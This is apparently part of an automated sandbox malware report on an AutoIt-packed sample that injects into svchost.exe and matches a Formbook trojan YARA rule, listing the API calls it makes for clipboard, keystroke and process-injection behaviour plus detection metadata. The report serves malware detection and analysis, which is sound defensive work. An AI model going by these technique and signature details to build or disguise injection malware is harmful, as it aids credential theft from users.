            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00FF4164
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FF3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FF3F66
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00FE001C
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_0100CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0100CABC

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: This is a third-party compiled AutoIt script.0_2_00F83B3A
            Source: psibx9rXra.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: psibx9rXra.exe, 00000000.00000000.2183924631.0000000001034000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ae869402-7
            Source: psibx9rXra.exe, 00000000.00000000.2183924631.0000000001034000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_6da90c36-3
            Source: psibx9rXra.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7e64d5a6-f
            Source: psibx9rXra.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_e67baf40-5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C743 NtClose,2_2_0042C743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,2_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FEA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00FEA1EF
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FD8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FD8310
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FE51BD
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F8E6A00_2_00F8E6A0
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FAD9750_2_00FAD975
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA21C50_2_00FA21C5
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB62D20_2_00FB62D2
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_010003DA0_2_010003DA
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB242E0_2_00FB242E
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA25FA0_2_00FA25FA
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F966E10_2_00F966E1
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FDE6160_2_00FDE616
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB878F0_2_00FB878F
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FE88890_2_00FE8889
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB68440_2_00FB6844
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F988080_2_00F98808
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_010008570_2_01000857
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FACB210_2_00FACB21
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB6DB60_2_00FB6DB6
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F96F9E0_2_00F96F9E
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F930300_2_00F93030
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FAF1D90_2_00FAF1D9
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA31870_2_00FA3187
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F812870_2_00F81287
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA14840_2_00FA1484
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F955200_2_00F95520
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA76960_2_00FA7696
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F957600_2_00F95760
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA19780_2_00FA1978
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FB9AB50_2_00FB9AB5
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F8FCE00_2_00F8FCE0
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_01007DDB0_2_01007DDB
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FABDA60_2_00FABDA6
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00FA1D900_2_00FA1D90
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F93FE00_2_00F93FE0
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_00F8DF000_2_00F8DF00
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: 0_2_019968C80_2_019968C8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004186932_2_00418693
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004168732_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028902_2_00402890
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101432_2_00410143
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E1C32_2_0040E1C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031F02_2_004031F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012202_2_00401220
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402CEA2_2_00402CEA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402CF02_2_00402CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024F02_2_004024F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401D102_2_00401D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042ED832_2_0042ED83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FF232_2_0040FF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC02C02_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD20002_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE44202_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBEFA02_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE2F302_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDCD1F2_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF75712_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C314602_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF43F2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB5BF02_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7DBF92_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FB802_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFB762_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEDAC62_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDDAAC2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C85AA02_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE1AA32_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFA492_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7A462_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB3A6C2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C499502_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B9502_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD59102_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C438E02_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAD8002_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C41F922_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFFB12_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFF092_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C49EB02_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5FDC02_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C43D402_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF1D5A2_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF7D732_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFFCF22_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB9C322_2_03CB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 102 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: String function: 00FA0AE3 appears 70 times
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: String function: 00FA8900 appears 42 times
            Source: C:\Users\user\Desktop\psibx9rXra.exeCode function: String function: 00F87DE1 appears 35 times
            Source: psibx9rXra.exe, 00000000.00000003.2191876416.0000000004363000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs psibx9rXra.exe
            Source: psibx9rXra.exe, 00000000.00000003.2192250796.000000000450D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs psibx9rXra.exe
            Source: psibx9rXra.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
